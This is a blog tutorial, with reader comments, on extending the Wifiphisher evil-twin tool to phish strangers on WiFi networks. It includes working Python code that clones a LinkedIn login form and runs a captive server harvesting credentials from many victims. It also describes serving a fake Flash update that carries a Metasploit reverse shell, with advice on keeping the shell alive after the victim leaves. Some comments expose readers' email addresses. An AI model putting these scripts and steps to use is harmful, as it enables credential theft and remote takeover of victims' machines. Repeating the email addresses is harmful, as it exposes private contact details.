
WiFi Social Engineering – Playing with Wifiphisher

First, a little background:

Wifiphisher is a WiFi social engineering tool that automates phishing attacks against WiFi networks. Wifiphisher is written in Python and was developed by Greek security researcher George Chatzisofroniou.

Wifiphisher made waves in the wireless security world because of its unconventional attack method. Unlike traditional WiFi attacks, it doesn’t involve any of the handshake capture or password brute-forcing that anyone who’s tested wireless networks has become accustomed to. Wifiphisher’s attack success relies on social engineering victims into handing you the wireless network key and more, as we’ll see below.

Wifiphisher’s operation can be summarized into a 3 stage attack:

  1. Start a fake wireless access point (AP), also known as an “evil twin”.
  2. Force victims to deauthenticate from the legitimate AP by sending deauthentication packets to them and to the access point they’re connected to.
  3. Get them to connect to your evil twin and serve them a web page that tricks them into giving you the wireless network password.

[Diagram: the three stages of a Wifiphisher attack]

It may seem like a lot of work, but one of the best things about Wifiphisher is its automation. All of the above can be done with a minimum amount of interaction from the operator. Wifiphisher’s deauthentication attack is inspired by Dan McInerney’s Wifijammer, which you should definitely check out.

To run Wifiphisher you will need:

  • A Linux system.
  • 2 wireless network adapters: one that supports AP mode to host the evil twin, and one capable of packet injection (for the deauthentication attack). I’m partial to Alfa cards, so I’d recommend one of those, like the Alfa AWUS036H or the Alfa AWUS051NH.

Playing with Wifiphisher:

Wifiphisher was initially built to capture wireless network credentials. At the time of writing, it has 3 phishing scenarios, the most popular being the “firmware-upgrade” page below.

[Screenshot: the “firmware-upgrade” phishing page]

Wifiphisher uses this web page to trick targets into giving up the wireless network password by convincing them that it is required for a router firmware upgrade. Once the user enters the passphrase, it is displayed on the operator’s terminal and Wifiphisher shuts down the fake access point, hopefully leaving the target none the wiser about what just happened.

[Screenshot: captured passphrase displayed on the operator’s terminal]

Adding phishing scenarios:

After using Wifiphisher for a few weeks, I figured that it would be fun to add a few more phishing scenarios to its arsenal. Unfortunately, Wifiphisher can’t contain any third-party material (such as logos or proprietary templates) due to copyright reasons; so no phishing pages for popular social media sites 🙁

But since I have no intention of distributing this modified version on GitHub, I figured it would be okay to go ahead and mess around with it anyway.

Creating a phishing page is usually pretty straightforward; download the original phishing page onto your system and modify the page’s login form to collect credentials.

The only catch with Wifiphisher is that while the attack is running, BOTH its operator (you) and the target lose internet connectivity: your adapters are busy hosting the evil twin and jamming, and the evil twin itself has no uplink. That means every phishing page has to be standalone, i.e. it can’t rely on any online resources (scripts, stylesheets, fonts or images fetched from the real site). Luckily, wget makes downloading a web page together with all of its requirements really simple:

$ wget -E -H -k -K -p <insert URL here>

The flags do the work: -p (--page-requisites) fetches the images, stylesheets and scripts the page needs, -H (--span-hosts) lets it follow those requisites onto other hosts such as CDNs, -k (--convert-links) rewrites the links so they point at the local copies, -K (--backup-converted) keeps the unmodified originals alongside them, and -E (--adjust-extension) saves HTML content with an .html extension. Running this should get you all the files you’ll need to set up your phishing page. I’ll be using the LinkedIn sign-in page for this post.

[Screenshot: wget downloading the LinkedIn sign-in page and its requisites]

Wifiphisher captures credentials by logging every POST request field whose name starts with the string “wfphshr”, meaning we’ll have to edit the username/email and password inputs in our web page so that their name attributes carry that prefix.

[Screenshot: login form fields renamed with the wfphshr prefix]

The prefix can be whatever you want it to be, so long as the prefix in Wifiphisher’s code and the one in the web pages match. The login form method also has to be POST, but this is almost always the case these days; a form that submits via GET would put the credentials in the URL and Wifiphisher’s handler, which only logs POST requests, would never see them. Lastly, we add the new phishing option to Wifiphisher’s menu. That’s it, that’s all it takes to prep a phishing page for use. Now all I had to do was repeat the process for all the scenarios I wanted to add. After that I changed Wifiphisher’s phishing page menu to incorporate all the phishing options I added.
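
Renaming the fields by hand is fine for one page but error-prone once you have several, so here is an added example that does the prep step programmatically. It is my own illustration, not code from Wifiphisher or from the mod described in this post, and it uses only the Python standard library: it streams a saved login page back out, rewrites every text/email/password/tel input inside a form so that its name carries the wfphshr prefix (the “wfphshr-” separator is my choice), forces the form method to POST and points the form action at a relative path so that the submission lands on the evil twin’s web server rather than the real site. The HTML at the bottom is a constructed LinkedIn-style form, not the markup wget downloads.

```python
from html import escape
from html.parser import HTMLParser

PREFIX = "wfphshr"                       # must match the prefix the capture handler looks for
CAPTURE_TYPES = {"text", "email", "password", "tel"}


class FormRewriter(HTMLParser):
    """Streams a saved HTML page back out, rewriting <form> and credential <input> tags."""

    def __init__(self, prefix=PREFIX, action="/"):
        super().__init__(convert_charrefs=False)   # keep entities verbatim so we can re-emit them
        self.prefix, self.action = prefix, action
        self.out, self.renamed, self.in_form = [], [], False

    @staticmethod
    def _attrs(attrs):
        return "".join(f' {k}="{escape(v, quote=True)}"' if v is not None else f" {k}"
                       for k, v in attrs)

    def _rewrite(self, tag, attrs):
        d = dict(attrs)
        if tag == "form":
            self.in_form = True
            d["method"] = "post"          # the handler only logs POST bodies
            d["action"] = self.action     # relative action: the request stays on the evil twin
        elif (tag == "input" and self.in_form and d.get("name")
              and (d.get("type") or "text").lower() in CAPTURE_TYPES
              and not d["name"].startswith(self.prefix)):
            self.renamed.append(d["name"])
            d["name"] = f"{self.prefix}-{d['name']}"
        return list(d.items())

    def handle_starttag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(self._rewrite(tag, attrs))}>")

    def handle_startendtag(self, tag, attrs):
        self.out.append(f"<{tag}{self._attrs(self._rewrite(tag, attrs))}/>")

    def handle_endtag(self, tag):
        if tag == "form":
            self.in_form = False
        self.out.append(f"</{tag}>")

    def handle_data(self, data):       self.out.append(data)
    def handle_entityref(self, name):  self.out.append(f"&{name};")
    def handle_charref(self, name):    self.out.append(f"&#{name};")
    def handle_comment(self, data):    self.out.append(f"<!--{data}-->")
    def handle_decl(self, decl):       self.out.append(f"<!{decl}>")


def rewrite(html, prefix=PREFIX, action="/"):
    """Return (rewritten_html, original names of the inputs that were prefixed)."""
    p = FormRewriter(prefix, action)
    p.feed(html)
    p.close()
    return "".join(p.out), p.renamed


# Constructed sample, not the real LinkedIn markup: a GET form submitting to the genuine site.
SAMPLE = """<!DOCTYPE html><html><body>
<form id="login" action="https://www.example.com/uas/login-submit" method="GET">
  <input type="hidden" name="csrfToken" value="ajax:123">
  <input type="email" name="session_key" placeholder="Email &amp; phone">
  <input type="password" name="session_password">
  <button type="submit">Sign in</button>
</form></body></html>"""

if __name__ == "__main__":
    page, fields = rewrite(SAMPLE)
    print(page)
    print("prefixed fields:", fields)
```

Run it against the index.html that wget saved, write the output back in place and diff it against the -K backup to confirm that only the form tag and the credential inputs changed; the hidden csrfToken keeps its name, since only text, email, password and tel fields are of interest to the capture.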


Testing it out:

1. Run Wifiphisher and select the strongest interface.

[Screenshot: running Wifiphisher and selecting the interface]

NOTE: I also modified Wifiphisher’s interface selection menu. If run without any arguments, Wifiphisher automatically selects the most powerful wireless interface as the jamming interface. It does this by scanning all WiFi networks in the area with all available wireless adapters; the interface that detects the most wireless networks gets selected as the jamming interface. This works pretty well on most runs, but I’ve found that on some occasions the wrong (weaker) interface will be selected. If the wrong card gets selected, the jamming stage of the attack might not even work, because most laptops’ internal network adapters don’t support packet injection. You can still run Wifiphisher with arguments to manually specify the jamming interface, but I wanted to change the default to manual interface selection anyway. The interface selection I used is inspired by Wifite.

2. Select a phishing scenario

[Screenshot: phishing scenario menu]

3. Select a WiFi network to target and wait for Wifiphisher to start the fake AP.

[Screenshot: selecting the target WiFi network]

4. Targets begin to connect to your evil twin

[Screenshot: targets connecting to the evil twin]

5. Target-side: Target is served the phishing page you selected, regardless of the site they browse to.

[Screenshots: the LinkedIn login page as served to the target]

6. Harvest credentials 🙂

[Screenshot: harvested LinkedIn credentials on the operator’s terminal]

NOTE: I also had to modify Wifiphisher’s request handler. It’s configured to automatically shut down after 1 user inputs credentials. However, because I want to be able to collect more than just 1 user’s credentials, I removed the automatic shutdown.
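
To make the two server-side behaviours in this step concrete, here is an added example: my own minimal stand-in written with Python’s http.server, not Wifiphisher’s actual request handler. It answers every GET, whatever host or path the victim asked for, with the phishing page (or one of its local requisites), parses each POST body for fields whose names start with wfphshr, appends them to an in-memory list and then keeps serving rather than shutting down after the first victim. DOCROOT, the bind address and the confirmation page are assumptions; the fallback form is constructed so the script runs without any downloaded files. The path check in resolve() is the caveat a practitioner would want: a web root that serves arbitrary requested paths has to refuse “..” traversal, otherwise the evil twin’s own filesystem is exposed to anyone who connects to it.

```python
import logging
import mimetypes
import os
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer
from urllib.parse import parse_qs

PREFIX = "wfphshr"                           # field-name prefix the pages were prepared with
DOCROOT = "phishing-pages/linkedin"          # assumption: where the wget output was placed
INDEX = "index.html"
BIND = ("0.0.0.0", 8080)                     # assumption; a real portal would sit on port 80

# Constructed stand-in page, used only when DOCROOT holds no files (e.g. when run as a demo).
FALLBACK_PAGE = (b"<html><body><form method='post' action='/'>"
                 b"<input name='wfphshr-email' type='email'>"
                 b"<input name='wfphshr-password' type='password'>"
                 b"<button>Sign in</button></form></body></html>")
CONFIRM_PAGE = b"<html><body><p>Signing in, please wait...</p></body></html>"

log = logging.getLogger("capture")


def extract_credentials(body, prefix=PREFIX):
    """Return {name: value} for every urlencoded POST field whose name carries the prefix.

    Fields without the prefix (hidden tokens, buttons) are dropped, so only what the
    phishing page was deliberately wired to collect ends up in the log.
    """
    fields = parse_qs(body.decode("utf-8", "replace"), keep_blank_values=True)
    return {name: values[-1] for name, values in fields.items() if name.startswith(prefix)}


def resolve(request_path, docroot=DOCROOT, index=INDEX):
    """Map a request path onto the document root. Anything that escapes the root, or
    does not exist, falls back to the phishing page (captive-portal behaviour)."""
    root = os.path.realpath(docroot)
    rel = request_path.split("?", 1)[0].lstrip("/")
    candidate = os.path.realpath(os.path.join(root, rel))
    inside = candidate.startswith(root + os.sep)          # rejects ../ traversal
    if inside and os.path.isfile(candidate):
        return candidate
    return os.path.join(root, index)


class CaptureHandler(BaseHTTPRequestHandler):
    captured = []           # shared across requests: the server stays up and accumulates

    def _send(self, status, body, ctype="text/html"):
        self.send_response(status)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.send_header("Cache-Control", "no-store")
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        # Whatever site the victim tried to browse to, they get the phishing page or one
        # of its local requisites (the css/js/images that wget -p -k pulled down).
        target = resolve(self.path)
        try:
            with open(target, "rb") as f:
                body = f.read()
        except OSError:
            body = FALLBACK_PAGE
        self._send(200, body, mimetypes.guess_type(target)[0] or "text/html")

    def do_POST(self):
        length = int(self.headers.get("Content-Length") or 0)
        creds = extract_credentials(self.rfile.read(length))
        if creds:
            CaptureHandler.captured.append({"client": self.client_address[0], **creds})
            log.warning("credentials from %s: %s", self.client_address[0], creds)
        # No shutdown here: unlike the stock behaviour described above, keep phishing.
        self._send(200, CONFIRM_PAGE)


if __name__ == "__main__":
    logging.basicConfig(level=logging.INFO, format="%(asctime)s %(message)s")
    log.info("serving %s on %s:%d", DOCROOT, *BIND)
    ThreadingHTTPServer(BIND, CaptureHandler).serve_forever()
```

Because captured is a class attribute rather than a per-request variable, every handler instance appends to the same list for the life of the process; dumping it on shutdown (or writing each hit to a file in do_POST) is all that is needed to keep more than one victim’s submission.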


Taking it further:

If we can display any web page to a target that successfully connects to our evil AP, why not serve them a page which advises them to download and install some “helpful” software? How about everybody’s favorite, Adobe Flash Player?

1. First we download the Adobe Flash Player installation page

[Screenshot: downloading the Adobe Flash Player installation page]

2. Next we change the download button to point to a file hosted on our system (adobe_update.exe). We’ll also reword the page’s text to convince our target to download the update file.

[Screenshot: modified download page pointing at adobe_update.exe]

3. Prepare the payload. There are countless ways to do this, I can’t get into the various options available right now. So for this post, I’m just going to use Shellter to inject a Metasploit reverse shell payload into an executable, any Windows executable will do. You can change the executable’s icon to Adobe’s logo to make it more convincing.

[Screenshot: Shellter injecting the Metasploit payload into the executable]

4. Fire up Wifiphisher and select the payload download option. I added a payload selection prompt when the “Adobe Flash Update” scenario is selected. All we have to do here is give it the full path to the payload we just prepared.

[Screenshots: payload download option and payload path prompt]

5. Wait for a target to connect to us.

[Screenshot: targets connecting to the evil twin]

6. Target-side: Target is served the Adobe update page as they try to browse and is convinced to download and install the update. We’ll even have our target scan it with their AV first, just in case the update isn’t legit.

[Screenshots: target downloads the “update” and scans it with their AV]

7. Target runs the update file and we get shell 🙂

[Screenshots: target runs the payload; reverse shell received in Metasploit]

NOTE: I suggest using a payload that connects back to a Metasploit listener on a publicly reachable host, so that when you shut down your evil twin, regardless of what network the user connects to next, you’ll still get a shell.

Conclusion:

I had a lot of fun messing around with Wifiphisher. I wasn’t able to contribute any of the scenarios in this post to the official version because of all the potential copyright violations mentioned earlier, but I did contribute a generic copyright-free payload download scenario. You can check out the “browser plugin update” scenario in the official Wifiphisher if you want to try out the payload attack above for yourself. Happy hunting.

Update:

I won’t be distributing this custom version of Wifiphisher any more since the official version of Wifiphisher now supports custom templates and a lot more features than this old mod. You can get Wifiphisher here.

188 Comments

  1. Hey Vivi, can you please mail me your version of Wifiphisher? This article came at just the moment I needed it. I am testing a new external wireless adapter but am unable to make it the AP interface.

  2. Good work VIVI!
    When I run Wifiphisher I can’t see LinkedIn in my menu, only the default functions like “firmware upgrade, oauth-login, plugin update etc.”
    Can you send me your version please? Thanks!

  3. Hey Vivi, seeing your post, you are a master. But I’m confused about adding more scenarios; it says error 404 not found. Can you please share your Wifiphisher version? Lots of thanks.

  4. Nice write-up, I really enjoyed reading it. Now I’m curious to try out all of these features! May I have a copy of your version too? I’m still not so good at Python but I believe that comparing the original version with this one will be a really good study!
    Cheers

  5. Very good post, I am studying these methods to increase my knowledge, I would like to try your own version.

  6. Good job man

    I was trying to do that but I can’t. If you could send me your version to test it and learn how you did it; my Python knowledge is a little poor and I want to learn more.

    Thanks

  7. Do you have a video tutorial on this? If not, can you make one? I really want to do a scenario of my own. I found some screenshots missing (and I’m a noob in this field). Tell me if I can copy a webpage using “save as” in any browser or if “wget” is compulsory!

    1. I don’t have a video tutorial. Please note that the current version of Wifiphisher has changed significantly from the version in this post; you can go through its documentation to better understand the process of adding scenarios.
      ‘Save as’ will work for some web pages, but for others you’ll be forced to use wget to download their dependencies; it all depends on the target page’s design.

  8. Thank you so much for your work. I really need the option to specify which card to jam; the official program always chooses the wrong one. Can I please test yours?

    1. Wifiphisher allows you to manually pick which card to jam with using the ‘--jamminginterface’ or ‘-jI’ switch when you’re running it. Check out the usage examples on its GitHub page. I’ll also send you this modded version.

  9. Hi VIVI,

    It looks awesome! I’m right now stuck with Wifiphisher trying to inject a reverse shell into an Android device (and it’s not working). I’d like to try your version, can you provide it? Thanks, my email: corugedo@yahoo.com

    Thanks & regards

  10. Hi Guys,
    You made an absolutely beautiful modded version, and I want to test it. Can you share your modded version with me please?
    A pleasure to read you!
    S

  11. You did some really interesting things there! Personally I haven’t been that successful with the official WifiPhisher. But I would love to toy around with your version! A share would be greatly appreciated.

    Keep it up!

  12. Hi Vivi. I use Google Translate. I would like to test your build. Is it possible to change the language in the script? With respect, Alex

  13. Very interesting tool. Can I have a copy to play around with please...
    Questions: I have 2 USB adapters, RTL8187 and RT2870. Are these adapters able to handle Wifiphisher?
    Thanks

    1. If at least one supports injection they should work with Wifiphisher. You can test injection support by running aireplay against the interface(s) e.g.
      $ aireplay-ng -9 wlan0

  14. Quickly tested it with a few runs... unfortunately with no luck at this point.
    – Your version uses one single interface only. Tried RTL8187; it does the injection okay, but when the target client actually connects to the fake AP the browser doesn’t respond at all. However, it is able to obtain an IP (10.0...), the browser just gets stuck with nothing. Not sure if RTL8187 supports an AP interface or not (iw info does show that it supports an AP interface).
    – Using RT2870 again, it does support injection (shown with aireplay-ng --test xxxxmon) even if not as well as RTL8187. It reacts similarly to RTL8187 with no response.
    – After playing around with Wifiphisher, Kali 2 Network Manager is not running any more, must reboot... why?

    Will test more when I have time... Thanks

  15. Just a thought: for a target router with WPA/WPA2, the pop-up should be as simple as the normal Windows connection prompt WITHOUT any logo/details; that is likely the best tactical approach. A simple pop-up window asking for the WPA/WPA2 passkey will do it because
    – if the target user knows about their modem/router, s/he will likely not respond if they see something out of the ordinary, such as a logo that does NOT match their modem/router brand. It will not just fail once but rather fail to target the same AP again forever...
    – if the user doesn’t know much about it, a firmware update/upgrade sounds like too much for them to handle, so they would rather give up and let someone else take care of it. So you likely fail again.
    – the most effective approach is simple for them to handle and deal with.
    cheers

  16. Hi, could I get a copy of your version please? Also my wget is missing pictures and other important parts; how can I help this?

  17. How did you change Wifiphisher so that it doesn’t exit after stealing just a single user’s credentials? Thanks in advance.

  18. Good job on this Vivi, I would like to contribute to your work on this tool. Kindly share a link to the file. Thanks and keep up the fantastic work.

  19. Could you explain how to keep it running after 1 person enters credentials? I’m altering the phishing page to simply capture an email, no password, and I’d like to be able to see how many people enter legit emails. I will later confront them to discuss additional security training. Thank you.

  20. The latest version keeps running after collecting info, so it does what I need for now. You can delete my question/comment if you’d like.

    1. That’s great. I was going to mention that the Wifiphisher version used in this article is pretty old. I had to modify the class that manages the web server and remove the shutdown statement after a POST request is logged. I haven’t gotten around to looking through the updated version’s code yet but I can already tell that a lot has changed.

  21. Greetings from Montenegro! 🙂
    Can you please send me the download link for your version of wifiphisher?

  22. I love your work, you are excellent at doing this tutorial and sharing your knowledge. Can I try your Wifiphisher version? Thanks from Mexico

  23. Hi Vivi,
    Hope you are doing fine. Can you share your version for testing purposes/personal use? I will appreciate it very much. Thanks again
    Kind Regards,
    George

  24. Hello Sir!
    Greetings from PH. Can I use your version? The latest version is very different from the one above.
    Thank you in advance.

  25. Hello VIVI, wow what a great tutorial. I’ve already tried flu*ion & Wifiphisher. But your Wifiphisher version looks much better. Way better. May I get a copy of your version by email? I have already played with Wifiphisher and the official one doesn’t seem “legit” with all the available scenarios. Thank you so much. And thank God I found this website 😀

  26. Hey man! That was pretty amazing! I always wondered if I could add my own phishing pages to Fluxion or Wifiphisher, but I couldn’t figure it out! Can you please send me your version so that maybe I can find the pattern in the script and play a little bit with it!
    Thank you so much! Greetings and appreciation from Belgium

      1. Hey man, sorry I messed up my email, it’s a “.” instead of a “-” (H*****.hatim@gmail.com)! Sorry about that and thank you so much <3

  27. Good post and great work VIVI
    I always wanted to play with the Wifiphisher script, add my own phishing pages and modify the request handler to capture more than one user’s credentials. Can you please send me your version!! To learn more tricks about that.

  28. Hi Vivi, I have a question. What if I only have 1 wireless card? It still runs, right? I mean, what is the effect if we only use 1 WiFi card?

    1. Hi. The tool will still run, but you won’t be able to use the deauthentication attack. Run Wifiphisher with the --nojamming option.

  29. Hi VIVI. Can I give the version you created a go please? It was interesting to read your step-by-step procedures. Thank you in advance. Also, what are the best security practices to prevent WiFi phishing attacks?

    1. Sure. A few general tips: switch your WiFi off when you’re not using it, avoid using public WiFi without additional security measures (e.g. a VPN) and just be aware of what’s going on with your browser/network connection. A little paranoia never hurt anyone.

  30. Hi,
    First of all, great work! I ended up on your website as I was reading some issues on the Wifiphisher GitHub and Sophron told somebody to take a look here.

    Your version is pretty neat; can you send a copy to my email so I can test it?

    Greetings from Brazil

  31. Hello VIVI, your tutorial is very good, I learned a lot of things. Can you send a copy of this version to me? Thank you very much!

  32. Hi,
    Really good job.
    Can we speak through mail or here?
    It is very hard for me to get this tool to work.
    Thanks in advance.

  33. You gotta be tired of people asking this by now haha,
    But could you send me a copy of your upgraded version?
    I think you did amazing work here. I love what you did with the interface, along with all the other templates added. I am very curious to see how you implemented the new templates into Wifiphisher along with the new interface. I tried to figure it out on my own at first, as I’m sure others did too; it seemed fairly extensive and I commend you for it, haha.
    (P.S. Have you seen the “new” Facebook Wi-Fi? Businesses use it; you have to sign in to Facebook and check in at a place in order to use their WiFi. I think it would fit really well into Wifiphisher, and it makes for a little more convincing phishing attack than the regular Facebook login portal that Wifiphisher came with. I mean, what kind of WiFi spot just asks someone to log into Facebook for no good reason?)

    1. Hehe. Just a little tired.

      I should clarify that this ISN’T an upgraded version. It’s just a mod of a very old version (> 1 year) of Wifiphisher.
      Wifiphisher has evolved a lot since then and the code base has changed significantly. The most recent version has a lot more features and improvements. I’ve sent you this old mod, but I’d advise you to use the most recent version of the tool. It now has a built-in template engine and a lot more phishing scenarios than it did when I wrote this blog post.

  34. Dear VIVI,
    I tried the steps to add the new pages to the directory (wifiphisher –> data –> phishing pages)
    and I got the default page, so would you please tell me how I can use your new pages?

    1. Hi, Mohamed. You should check out the “Creating a custom phishing scenario” section in the Wifiphisher documentation.
      There are a few other steps such as creating a config.ini file that you need to do as well. The steps in this blogpost are for a much older version of Wifiphisher.

    1. Hi, Mina.
      I’m not actually on the development team, I just really liked the tool and decided to put up a blogpost about it.
      From what I can tell, Sophron and the rest of the team have plans to implement some of those recommendations.

  35. OK... but I was talking about your version, to put these features in them.
    ... It would be great if you joined the development team ☺️☺️

  36. Very interesting tool, I just recently discovered your version/modifications. I would be very grateful if you could provide a link to your version to test. Please keep up the great articles; it would also be great if your site had an option to donate some cryptocurrency.
